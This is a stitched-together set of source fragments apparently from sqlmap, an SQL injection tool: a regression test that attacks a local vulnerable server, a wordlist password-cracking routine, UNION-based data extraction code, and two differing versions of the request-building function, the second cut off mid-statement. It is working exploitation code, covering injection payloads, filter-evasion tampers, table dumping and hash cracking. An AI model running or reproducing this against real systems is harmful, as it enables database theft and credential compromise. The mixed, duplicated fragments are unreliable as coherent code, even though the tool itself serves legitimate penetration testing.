"Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --banner --invalid-logical --technique=B --predict-output --test-filter=\"OR boolean\" --tamper=space2dash", ("banner: '3.", " LIKE ")), ("-u <url> --flush-session --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\" --tables --union-cols=3", ("might be injectable", "Cookie #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --null-connection --technique=B --tamper=between,randomcase --banner --count -T users", ("NULL connection is supported with HEAD method", "banner: '3.", "users | 5")), ("-u <base> --data=\"aWQ9MQ==\" --flush-session --base64=POST -v 6", ("aWQ9MTtXQUlURk9SIERFTEFZICcwOjA",)), ("-u <url> --flush-session --parse-errors --test-filter=\"subquery\" --eval=\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\" --referer=\"localhost\"", ("might be injectable", ": syntax error", "back-end DBMS: SQLite", "WHERE or HAVING clause (subquery")), ("-u <url> --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")), ("-u <url> --technique=U --fresh-queries --force-partial --dump -T users --dump-format=HTML --answers=\"crack=n\" -v 3", ("performed 6 queries", "nameisnull", "~using default dictionary", "dumped to HTML file")), ("-u <url> --flush-session --all", ("5 entries", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")), ("-u <url> -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [5]", "nameisnull")), ("-u \"<url>&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)), ("-u \"<url>&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), ("-d \"<direct>\" --flush-session --dump -T users --dump-format=SQLITE --binary-fields=name --where \"id=3\"", ("7775", "179ad45c6ce2cb97cf1029e212046e81 (testpass)", "dumped to SQLITE database")), ("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5, foobar, nameisnull", "'987654321'",)), ("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")), ) retVal = True count = 0 while True: address, port = "127.0.0.1", random.randint(10000, 65535) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if s.connect_ex((address, port)): break else: time.sleep(1) finally: s.close() def _thread(): vulnserver.init(quiet=True) vulnserver.run(address=address, port=port) vulnserver._alive = True thread = threading.Thread(target=_thread) thread.daemon = True thread.start() while vulnserver._alive: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((address, port)) s.sendall(b"GET / HTTP/1.1\r\n\r\n") result = b"" while True: current = s.recv(1024) if not current: break else: result += current if b"vulnserver" in result: break except: pass finally: s.close() time.sleep(1) if not vulnserver._alive: logger.error("problem occurred in vulnserver instantiation (address: 'http://%s:%s')" % (address, port)) return False else: logger.info("vulnserver running at 'http://%s:%s'..." % (address, port)) handle, config = tempfile.mkstemp(suffix=".conf") os.close(handle) handle, database = tempfile.mkstemp(suffix=".sqlite") os.close(handle) with sqlite3.connect(database) as conn: c = conn.cursor() c.executescript(vulnserver.SCHEMA) handle, request = tempfile.mkstemp(suffix=".req") os.close(handle) handle, log = tempfile.mkstemp(suffix=".log") os.close(handle) handle, multiple = tempfile.mkstemp(suffix=".lst") os.close(handle) content = "POST / HTTP/1.0\nUser-agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port) with open(request, "w+") as f: f.write(content) f.flush() content = '<port>%d</port><request base64="true"><![CDATA[%s]]></request>' % (port, encodeBase64(content, binary=False)) with open(log, "w+") as f: f.write(content) f.flush() base = "http://%s:%d/" % (address, port) url = "%s?id=1" % base direct = "sqlite3://%s" % database tmpdir = tempfile.mkdtemp() content = open(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.conf"))).read().replace("url =", "url = %s" % url) with open(config, "w+") as f: f.write(content) f.flush() content = "%s?%s=%d\n%s?%s=%d\n%s&%s=1" % (base, randomStr(), randomInt(), base, randomStr(), randomInt(), url, randomStr()) with open(multiple, "w+") as f: f.write(content) f.flush() for options, checks in TESTS: status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS))) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) if IS_WIN and "uraj" in options: options = options.replace(u"\u0161u\u0107uraj", "sucuraj") checks = [check.replace(u"\u0161u\u0107uraj", "sucuraj") for check in checks] for tag, value in (("<url>", url), ("<base>", base), ("<direct>", direct), ("<tmpdir>", tmpdir), ("<request>", request), ("<log>", log), ("<multiple>", multiple), ("<config>", config), ("<base64>", url.replace("id=1", "id=MZ=%3d"))): options = options.replace(tag, value) cmd = "%s \"%s\" %s --batch --non-interactive --debug --time-sec=1" % (sys.executable if ' ' not in sys.executable else '"%s"' % sys.executable, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), options) if "<tmpfile>" in cmd: handle, tmp = tempfile.mkstemp() os.close(handle) cmd = cmd.replace("<tmpfile>", tmp) output = shellExec(cmd) if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks) or "unhandled exception" in output: dataToStdout("---\n\n$ %s\n" % cmd) dataToStdout("%s---\n" % output, coloring=False) retVal = False count += 1 clearConsoleLine() if retVal: logger.info("vuln test final result: PASSED") else: logger.error("vuln test final result: FAILED") return retVal
def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): count = 0 rotator = 0 hashes = set([item[0][1] for item in attack_info]) wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if not attack_info: break if not isinstance(word, basestring): continue if suffix: word = word + suffix try: current = __functions__[hash_regex](password = word, uppercase = False) count += 1 if current in hashes: for item in attack_info[:]: ((user, hash_), _) = item if hash_ == current: retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) attack_info.remove(item) elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception, e: warnMsg = "there was a problem while hashing entry: %s. " % repr(word) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, 'value'): proc_count.value -= 1
def unionUse(expression, unpack=True, dump=False): """ This function tests for an UNION SQL injection on the target URL then call its subsidiary function to effectively perform an UNION SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if conf.api else None if Backend.isDbms(DBMS.MSSQL) and kb.dumpColumns: kb.rowXmlMode = True _ = "(%s FOR XML RAW, BINARY BASE64)" % expression output = _oneShotUnionUse(_, False) value = parseUnionPage(output) kb.rowXmlMode = False if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it expression = re.sub(r"(?i)\s*ORDER BY\s+[\w,]+", "", expression) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = unArrayizeValue(parseUnionPage(output)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "used SQL query returns " infoMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") logger.info(infoMsg) elif count and (not isinstance(count, six.string_types) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value if isNumPosStrValue(count) and int(count) > 1: threadData = getCurrentThreadData() try: threadData.shared.limits = iter(xrange(startLimit, stopLimit)) except OverflowError: errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) errMsg += "with switch '--fresh-queries'" raise SqlmapDataException(errMsg) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.counter = 0 threadData.shared.lastFlushed = startLimit - 1 threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 if threadData.shared.showEta: threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: threadData.shared.counter += 1 num = next(threadData.shared.limits) except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: with kb.locks.value: if all(_ in output for _ in (kb.chars.start, kb.chars.stop)): items = parseUnionPage(output) if threadData.shared.showEta: threadData.shared.progress.progress(threadData.shared.counter) if isListLike(items): # in case that we requested N columns and we get M!=N then we have to filter a bit if len(items) > 1 and len(expressionFieldsList) > 1: items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] items = [_ for _ in flattenValue(items)] if len(items) > len(expressionFieldsList): filtered = OrderedDict() for item in items: key = re.sub(r"[^A-Za-z0-9]", "", item).lower() if key not in filtered or re.search(r"[^A-Za-z0-9]", item): filtered[key] = item items = filtered.values() items = [items] index = None for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, items)) else: index = None if threadData.shared.showEta: threadData.shared.progress.progress(threadData.shared.counter) for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, None)) items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] if not isNoneValue(_): threadData.shared.value.extend(arrayizeValue(_)) del threadData.shared.buffered[0] if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: _ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, six.string_types) else [items])) status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_)) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\n" % status) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: for _ in sorted(threadData.shared.buffered): if not isNoneValue(_[1]): threadData.shared.value.extend(arrayizeValue(_[1])) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if conf.httpHeaders: headers = dict(conf.httpHeaders) contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode: kb.postUrlEncode = False conf.httpHeaders = [ _ for _ in conf.httpHeaders if _[1] != contentType ] contentType = POST_HINT_CONTENT_TYPES.get( kb.postHint, PLAIN_TEXT_CONTENT_TYPE) conf.httpHeaders.append( (HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload=payload, headers=auxHeaders) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] elif kb.postHint == POST_HINT.JSON_LIKE: payload = payload.replace("'", REPLACEMENT_MARKER).replace( '"', "'").replace(REPLACEMENT_MARKER, '"') if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] payload = payload.replace("'", REPLACEMENT_MARKER).replace( '"', "'").replace(REPLACEMENT_MARKER, '"') value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be throughly URL encoded if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE ) and not conf.skipUrlEncode or place in ( PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode: payload = urlencode( payload, '%', False, place != PLACE.URI) # spaceplus is handled down below value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) match = re.search( "(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") for splitter in (urlencode(' '), ' '): if splitter in payload: prefix, suffix = ( "*/", "/*") if splitter == ' ' else ( urlencode(_) for _ in ("*/", "/*")) parts = payload.split(splitter) parts[0] = "%s%s" % (parts[0], suffix) parts[-1] = "%s%s=%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1]) for i in xrange(1, len(parts) - 1): parts[i] = "%s%s=%s%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix) payload = "".join(parts) for splitter in (urlencode(','), ','): payload = payload.replace( splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name"))) value = agent.replacePayload(value, payload) else: warnMsg = "HTTP parameter pollution works only with regular " warnMsg += "GET and POST parameters" singleTimeWarnMessage(warnMsg) if place: value = agent.removePayloadDelimiters(value) if PLACE.GET in conf.parameters: get = conf.parameters[ PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[ PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace( CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value post = post.replace(ASTERISK_MARKER, '*') if post else post if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[ PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[ PLACE. USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[ PLACE. REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[ PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if value and place == PLACE.CUSTOM_HEADER: if not auxHeaders: auxHeaders = {} auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub( "%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter( cookie, randomParameter) if conf.evalCode: delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER variables = {} originals = {} for item in filter(None, (get, post if not kb.postHint else None)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) value = urldecode(value, convall=True, plusspace=(item == post and kb.postSpaceToPlus)) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) if cookie: for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): if '=' in part: name, value = part.split('=', 1) value = urldecode(value, convall=True) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): found = False value = unicode(value) regex = r"((\A|%s)%s=).+?(%s|\Z)" % ( re.escape(delimiter), name, re.escape(delimiter)) if re.search(regex, (get or "")): found = True get = re.sub(regex, "\g<1>%s\g<3>" % value, get) if re.search(regex, (post or "")): found = True post = re.sub(regex, "\g<1>%s\g<3>" % value, post) regex = r"((\A|%s)%s=).+?(%s|\Z)" % ( re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) if re.search(regex, (cookie or "")): found = True cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie) if not found: if post is not None: post += "%s%s=%s" % (delimiter, name, value) elif get is not None: get += "%s%s=%s" % (delimiter, name, value) elif cookie is not None: cookie += "%s%s=%s" % ( conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value) if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr( post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif kb.postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime( "%X") warnMsg += "larger statistical model, please wait" dataToStdout(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) dataToStdout('.') dataToStdout("\n") elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter " warnMsg += "during usage of time-based payloads to prevent potential " warnMsg += "errors " singleTimeWarnMessage(warnMsg) if not kb.laggingChecked: kb.laggingChecked = True deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "10 or more)" logger.critical(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False pushValue(kb.pageCompress) kb.pageCompress = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) if headers: if kb.nullConnection in ( NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ ) and HTTP_HEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: pageLength = int( headers[HTTP_HEADER.CONTENT_RANGE] [headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) kb.pageCompress = popValue() if not pageLength: try: page, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) except MemoryError: page, headers, code = None, None, None warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " warnMsg += "behavior in custom WAF/IDS/IPS solutions" singleTimeWarnMessage(warnMsg) if conf.secondOrder: page, headers, code = Connect.getPage( url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastResponseDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison( page, headers, code, getRatioValue=True, pageLength=pageLength) else: return comparison(page, headers, code, getRatioValue, pageLength)
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place in (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char if place != PLACE.URI or (value and payload and '?' in value and value.find('?') < value.find(payload)): payload = urlencode(payload, '%', False, True) if not place in (PLACE.POST, PLACE.CUSTOM_POST) and conf.skipUrlEncode else payload value = agent.replacePayload(value, payload) elif place == PLACE.SOAP: # payloads in SOAP should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") value = agent.replacePayload(value, payload) if place: value = agent.removePayloadDelimiters(value) if place == PLACE.COOKIE and conf.cookieUrlencode: value = urlEncodeCookieValues(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value if PLACE.SOAP in conf.parameters: post = conf.parameters[PLACE.SOAP] if place != PLACE.SOAP or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.UA in conf.parameters: ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in [PLACE.GET, PLACE.POST, PLACE.COOKIE]: if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.pDel or "&" variables = {} originals = {} for item in filter(None, (get, post)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) evaluateCode("%s='%s'" % (name, value), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): value = unicode(value) if '%s=' % name in (get or ""): get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) elif '%s=' % name in (post or ""): post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) elif post: post += "%s%s=%s" % (delimiter, name, value) else: get += "%s%s=%s" % (delimiter, name, value) get = urlencode(get, limit=True) if post and place not in (PLACE.POST, PLACE.SOAP, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif not conf.skipUrlEncode and place not in (PLACE.SOAP,): post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = False warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). 